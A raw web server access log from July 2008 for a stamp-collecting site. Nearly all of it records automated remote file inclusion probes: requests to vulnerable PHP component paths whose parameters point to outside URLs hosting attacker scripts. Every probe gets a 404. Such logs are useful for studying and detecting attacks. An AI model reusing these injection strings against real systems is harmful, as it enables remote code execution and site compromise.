160.99.12.231 - - [13/Jul/2008:21:44:33 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
70.85.102.132 - - [13/Jul/2008:21:45:02 -0700] "GET //components/errors.php?error=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.mathstamps.com"
70.85.102.132 - - [13/Jul/2008:21:45:02 -0700] "GET /logs//components/errors.php?error=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.mathstamps.com"
160.99.12.231 - - [13/Jul/2008:21:46:24 -0700] "GET /logs/access_080505.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
160.99.12.231 - - [13/Jul/2008:21:46:24 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
160.99.12.231 - - [13/Jul/2008:21:46:25 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
160.99.12.231 - - [13/Jul/2008:21:46:37 -0700] "GET /logs/access_080428.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
74.6.18.233 - - [13/Jul/2008:21:46:53 -0700] "GET /logs/access_080707.log HTTP/1.0" 200 6506642 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
75.102.21.29 - - [13/Jul/2008:21:47:38 -0700] "GET ///components/com_facileforms/facileforms.frame.php?ff_compath=http://www.handowire.com/bbs/Paddy/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
212.122.200.198 - - [13/Jul/2008:21:48:13 -0700] "GET ///components/com_facileforms/facileforms.frame.php?ff_compath=http://www.handowire.com/bbs/Paddy/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
72.52.131.56 - - [13/Jul/2008:21:53:43 -0700] "GET /logs/access_080526.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
72.52.131.56 - - [13/Jul/2008:21:53:43 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
72.52.131.56 - - [13/Jul/2008:21:53:43 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
72.52.131.56 - - [13/Jul/2008:21:53:53 -0700] "GET /logs/access_080526.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mta.cl/phpform/use/coco.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
72.52.131.56 - - [13/Jul/2008:21:53:53 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mta.cl/phpform/use/coco.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
72.52.131.56 - - [13/Jul/2008:21:53:53 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mta.cl/phpform/use/coco.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
70.85.102.100 - - [13/Jul/2008:21:53:54 -0700] "GET /errors.php?error=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.mathstamps.com"
70.85.102.100 - - [13/Jul/2008:21:53:55 -0700] "GET /logs/errors.php?error=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.mathstamps.com"
75.0.18.81 - - [13/Jul/2008:21:54:23 -0700] "GET /errors.php?error=http://www.domsete.com.br/dom730/images/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.mathstamps.com"
75.0.18.81 - - [13/Jul/2008:21:54:23 -0700] "GET /logs/errors.php?error=http://www.domsete.com.br/dom730/images/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.mathstamps.com"
82.194.70.164 - - [13/Jul/2008:21:55:04 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/save.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
212.34.153.42 - - [13/Jul/2008:21:56:30 -0700] "GET //components/errors.php?error=http://www.domsete.com.br/dom730/images/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.mathstamps.com"
212.34.153.42 - - [13/Jul/2008:21:56:30 -0700] "GET /logs//components/errors.php?error=http://www.domsete.com.br/dom730/images/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.mathstamps.com"
75.102.21.29 - - [13/Jul/2008:21:58:04 -0700] "GET ///components/com_facileforms/facileforms.frame.php?ff_compath=http://www.handowire.com/bbs/Paddy/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.233.160.136 - - [13/Jul/2008:22:00:03 -0700] "GET /logs/access_080107.log HTTP/1.0" 200 30929 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Google Wireless Transcoder;)" "www.mathstamps.com"
64.14.74.41 - - [13/Jul/2008:22:02:48 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath%5Bpath%5D=http://www.dabrosca.net/demo????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
205.234.163.201 - - [13/Jul/2008:22:06:10 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://blakkacid.com/cms/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.mathstamps.com"
205.234.163.201 - - [13/Jul/2008:22:06:10 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://blakkacid.com/cms/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.mathstamps.com"
64.14.74.41 - - [13/Jul/2008:22:09:53 -0700] "GET /logs/access_080526.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath%5Bpath%5D=http://www.dabrosca.net/demo????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.14.74.41 - - [13/Jul/2008:22:09:53 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath%5Bpath%5D=http://www.dabrosca.net/demo????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.14.74.41 - - [13/Jul/2008:22:10:44 -0700] "GET /logs/access_080616.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath%5Bpath%5D=http://www.dabrosca.net/demo????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
82.194.70.164 - - [13/Jul/2008:22:11:08 -0700] "GET /logs/access_080421.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/save.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
82.194.70.164 - - [13/Jul/2008:22:11:08 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/save.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:22:11:50 -0700] "GET /logs/access_080630.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:22:11:50 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:22:11:51 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:22:12:50 -0700] "GET /logs/access_080630.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:22:12:50 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:22:12:51 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:22:12:51 -0700] "GET /logs/access_080630.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:22:12:51 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:22:12:52 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.70.164 - - [13/Jul/2008:22:15:14 -0700] "GET /logs/access_080526.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/save.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:22:17:32 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:22:18:00 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:22:18:03 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
70.85.102.132 - - [13/Jul/2008:22:25:02 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.mathstamps.com"
70.85.102.132 - - [13/Jul/2008:22:25:02 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.mathstamps.com"
194.79.75.195 - - [13/Jul/2008:22:28:07 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.mathstamps.com"
194.79.75.195 - - [13/Jul/2008:22:28:07 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.mathstamps.com"
87.106.101.71 - - [13/Jul/2008:22:38:59 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
204.15.10.22 - - [13/Jul/2008:22:41:01 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.mathstamps.com"
204.15.10.22 - - [13/Jul/2008:22:41:01 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.mathstamps.com"
80.190.131.43 - - [13/Jul/2008:22:41:33 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.mathstamps.com"
89.186.169.135 - - [13/Jul/2008:22:42:27 -0700] "GET /logs/access_080505.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.186.169.135 - - [13/Jul/2008:22:42:27 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.186.169.135 - - [13/Jul/2008:22:42:27 -0700] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.186.169.135 - - [13/Jul/2008:22:42:45 -0700] "GET /logs/access_080519.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.75.35.118 - - [13/Jul/2008:22:42:49 -0700] "GET /logs/access_080630.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.75.35.118 - - [13/Jul/2008:22:42:49 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.75.35.118 - - [13/Jul/2008:22:42:49 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.75.35.118 - - [13/Jul/2008:22:42:52 -0700] "GET /logs/access_080526.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
83.19.144.26 - - [13/Jul/2008:22:42:52 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.mathstamps.com"
83.19.144.26 - - [13/Jul/2008:22:42:53 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.mathstamps.com"
78.111.80.230 - - [13/Jul/2008:22:43:43 -0700] "GET /logs/access_080630.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.dutadewata.com/img/id4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
78.111.80.230 - - [13/Jul/2008:22:43:43 -0700] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://www.dutadewata.com/img/id4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
78.111.80.230 - - [13/Jul/2008:22:43:44 -0700] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.dutadewata.com/img/id4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
77.92.74.1 - - [13/Jul/2008:22:44:05 -0700] "GET /logs/access_080623.log//components/com_performs/performs.php?mosConfig_absolute_path=http://geocities.com/titit_tuit/tutor/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.74.1 - - [13/Jul/2008:22:44:07 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://geocities.com/titit_tuit/tutor/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.74.1 - - [13/Jul/2008:22:44:10 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://geocities.com/titit_tuit/tutor/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
89.218.85.18 - - [13/Jul/2008:22:45:01 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/cripya/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.92.74.1 - - [13/Jul/2008:22:46:55 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://geocities.com/titit_tuit/tutor/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.74.1 - - [13/Jul/2008:22:47:17 -0700] "GET /logs/access_080609.log//components/com_performs/performs.php?mosConfig_absolute_path=http://geocities.com/titit_tuit/tutor/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
78.111.80.230 - - [13/Jul/2008:22:47:47 -0700] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://www.dutadewata.com/img/id4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.75.35.118 - - [13/Jul/2008:22:47:47 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.186.169.135 - - [13/Jul/2008:22:47:52 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
204.15.10.22 - - [13/Jul/2008:22:48:31 -0700] "GET /logs/access_080623.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
204.15.10.22 - - [13/Jul/2008:22:48:32 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
204.15.10.22 - - [13/Jul/2008:22:48:32 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.252.183 - - [13/Jul/2008:22:48:53 -0700] "GET /logs/access_080623.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.252.183 - - [13/Jul/2008:22:48:53 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.252.183 - - [13/Jul/2008:22:48:53 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
204.15.10.22 - - [13/Jul/2008:22:50:02 -0700] "GET /logs/access_080609.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.252.183 - - [13/Jul/2008:22:50:30 -0700] "GET /logs/access_080609.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
193.178.228.12 - - [13/Jul/2008:22:51:59 -0700] "GET /logs/access_080623.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
193.178.228.12 - - [13/Jul/2008:22:51:59 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
193.178.228.12 - - [13/Jul/2008:22:52:00 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
193.178.228.12 - - [13/Jul/2008:22:54:40 -0700] "GET /logs/access_080609.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
80.190.131.43 - - [13/Jul/2008:22:56:36 -0700] "GET //components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.mathstamps.com"
83.19.144.26 - - [13/Jul/2008:22:56:48 -0700] "GET /logs/access_080623.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
83.19.144.26 - - [13/Jul/2008:22:56:49 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
83.19.144.26 - - [13/Jul/2008:22:56:50 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
80.190.131.43 - - [13/Jul/2008:22:58:40 -0700] "GET /logs/access_080609.log//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.mathstamps.com"
80.190.131.43 - - [13/Jul/2008:22:58:41 -0700] "GET //components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.mathstamps.com"
80.190.131.43 - - [13/Jul/2008:22:58:41 -0700] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.mathstamps.com"
89.218.85.18 - - [13/Jul/2008:22:59:53 -0700] "GET /logs/access_080609.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://roy.sinopsis.googlepages.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.218.85.18 - - [13/Jul/2008:22:59:53 -0700] "GET /logs/access_080609.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://roy.sinopsis.googlepages.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.218.85.18 - - [13/Jul/2008:22:59:53 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://roy.sinopsis.googlepages.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.218.85.18 - - [13/Jul/2008:22:59:53 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://roy.sinopsis.googlepages.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.218.85.18 - - [13/Jul/2008:22:59:54 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://roy.sinopsis.googlepages.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.218.85.18 - - [13/Jul/2008:22:59:54 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://roy.sinopsis.googlepages.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.190.131.43 - - [13/Jul/2008:23:00:11 -0700] "GET /logs/access_080623.log//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.mathstamps.com"
83.19.144.26 - - [13/Jul/2008:23:00:45 -0700] "GET /logs/access_080609.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
89.218.85.18 - - [13/Jul/2008:23:01:34 -0700] "GET /logs/access_080428.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://roy.sinopsis.googlepages.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.218.85.18 - - [13/Jul/2008:23:01:34 -0700] "GET /logs/access_080428.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://roy.sinopsis.googlepages.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
75.0.18.81 - - [13/Jul/2008:23:06:03 -0700] "GET //include/lib.inc.php?site_path=http://www.domsete.com.br/dom730/images/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.mathstamps.com"
75.0.18.81 - - [13/Jul/2008:23:06:03 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.domsete.com.br/dom730/images/mambo??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.mathstamps.com"
64.128.80.11 - - [13/Jul/2008:23:10:55 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.mathstamps.com"
64.128.80.11 - - [13/Jul/2008:23:10:55 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.mathstamps.com"
212.34.153.42 - - [13/Jul/2008:23:10:58 -0700] "GET /errors.php?error=http://www.domsete.com.br/dom730/images/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.mathstamps.com"
